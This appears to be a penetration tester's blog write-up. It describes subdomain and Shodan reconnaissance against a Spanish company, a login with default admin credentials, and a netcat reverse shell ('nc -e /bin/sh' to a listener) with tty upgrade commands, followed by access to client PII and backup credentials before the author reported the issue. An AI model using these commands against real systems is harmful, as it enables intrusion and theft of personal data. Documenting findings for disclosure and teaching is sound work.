
Gaining Access via Remote Code Execution to Multi-Million Dollar Company


Hello again, I’ve been making some audits at this time. I had a great time breaking misconfigurations & vulnerabilites on Companys.
Well I’m going to disclouse the techniques that I use, and how I obtain a RCE on a Multi-Million Dollar Company which have HQ in Spain.


All the information detailed here are going to be pixeled and the name of the Company are not going to be revealed. Only I mention the technique that I use commonly to discover vulnerabilites into Companys.

All the domains I show in the document are only examples, the company affected is not revealed.


Enumeration of the subdomains of the Corp.
Default admin credentials left on a subdomain.
The default credentials leads into a RCE.
Generating a Connection between my machine and the company server.

Enumeration & First Steps

Always when I go to start to make a pentest to a corp, I firstly recopile all the info about domains associated with the corp & subdomains.
For that I follow a those steps:

WebPage Certificate

Firstly i go into the main webpage of the corp and I see the SSL Certificate that the use and if I can get extra info about the corp.

Sample Image

This screenshot of that certificate is not from the Corp Affected, is from correosexpress like a sample.

Obtaining Domains Via Organization Certificate.

After I see the Organization of the Corp affected, I made a little recon using his Organization Name, on this case I’m going to use the Organization of correos like sample.

So I use two different ways to recopile domains from the organization. The first is directly & the second indirectly.

First Method(DomainCollector).

I use to extract domains directly from a Organization using DomainCollector.
A great tool developed by Cyber-Guy1

To obtain domains with the Organization Name with DomainCollector we need to execute this following lines on the terminal:

sudo apt install git python3 python3-pip
git clone https://github.com/Cyber-Guy1/domainCollector
pip3 install -r requirements.txt
python3 domainCollector.py "Correos Express Paqueteria Urgente SA"

After that I got a .txt with the name of the Organization with the following domains:


Second Method (Indirectly)

I use shodan for all the recons I make, because shodan give us too much servers that we can obtain via SubdomainFinder.

I use the following dorks in Shodan to discover servers.

ssl.cert.subject.cn:*.correosexpress.com ssl:"correosexpress.com" 200

And I obtain the following responses:



On the second Screenshot I remark that I can see the Organization of CorreosExpress. If I click on this Org:


I can see here the total results are different on this query, and I got differents servers with the org search.

Obtaining Subdomains from main domain.

This is one of the most important steps to make a great recon.

I use a tool created by again CyberGuy1. Which is Subdomainer, is a great tool due to the tool implements other tools of Domain Gathering like Sublist3r, Amass, Github-Search….

The proyect has been marked as Deprectated, but I made some changes on the code of subdomainer.sh making the program availble again with the tools that I want to use. I use python 3.10.2 to run the code.


Running the subdomainer.sh the script start to run the different tools.
On the last part the script use a tool with the name httpx. Which check if the subdomains obtained with the differents tools are alive.

After that, the script save all the information in a folder with all the info recopiled and a all-live.txt with the alive subdomains.


The history who leads into a RCE in a Multi-Million Dollar Company.


Well I show the techniques that I use to made a recon of the corp. But Now I’m going to explain what happen to leads into a RCE.

On the company affected I first choose to go against the subdomains obtained via Subdomainer. I spent several hours trying to detect any vulnerability but everything was really well set up, there were no typical bugs, no misconfigurations and all the endpoints found were restricted.

I was really surprised because so far the security on the subdomains was very good.

But I decided to move into the servers I got from shodan. And theres when all start to change.

Before found the RCE on one server, I found other servers with some misconfigurations but nothing with high severity and critical.

But go into the server when I found the RCE.

Login & RCE

The subdomain is a automation server with tasks scheduled and have a command line to execute commands on the server. And this is the heavy point.

For execute commands you need a valid credentials login.

And I always on a login panel I trie the default credentials:

And after send the requests I got redirected to the main panel.

So YES, I got an access with admin default credentials, a very serious error by the admin.


And Now I see the Commands tab, when I entry and I see what Can I do, so I got the Idea of obtain a reverse shell to my machine.

So firstly I go to PentestMonkey Reverse Shell, on this site we have differents cheat sheet, but actually I look the Cheat Sheet of Reverse Shells.

After that I select the following command to establish a connection to my machine:

nc -e /bin/sh IP 4444

But before we need to listen in the port 4444 on my machine:

nc -nlvp 4444

After that I’m going to execute the command to establish connection with the remote server.

Reverse Shell

And a few seconds later…. I got a connection received on my machine.


After that I can retrieve information from the server. Which it have files with PII data from their clients and their partners.

Also for a better movement inside the server, I made the tty more interactive with the following commands:

script /dev/null -c bash
    Script started, file is /dev/null
USER@host:/$ ^Z
    bash: suspended  nc -nlvp 4444
stty raw -echo; fg
[1]  + continued  nc -nlvp 4444
reset: unknown terminal type unknown
Terminal type? xterm

tty And now the tty is more interactive and easier to go deep into de server.
Also I obtain the source code of some subdomains of the corp.
Inside the subdomains I obtain some other credentials from backup hosting and more….
But after all I decide to stop and report it immediately.

Status of the Report.

I report all this to the Company affected, actually the company know about this and they fix the default credentials of the admin.

Recommendations for the company.

Well I’ve been talking with the company and I only have good words for them, professional people and they take seriously their security.

The server which I has access was a docker environment, a very good measure of security to isolate and doesn’t can to pivot inside the net to reach other servers.

But I recommend them to move the PII data of their clients/partners to a secure server with no exposure to internet.


That was a funny target and very easy entry but fun atleast because I got access to a Remote Command Execution in the Server.

Maybe in the future I make more posts disclosing vulnerabilities I found.

Thanks for reading. ;)

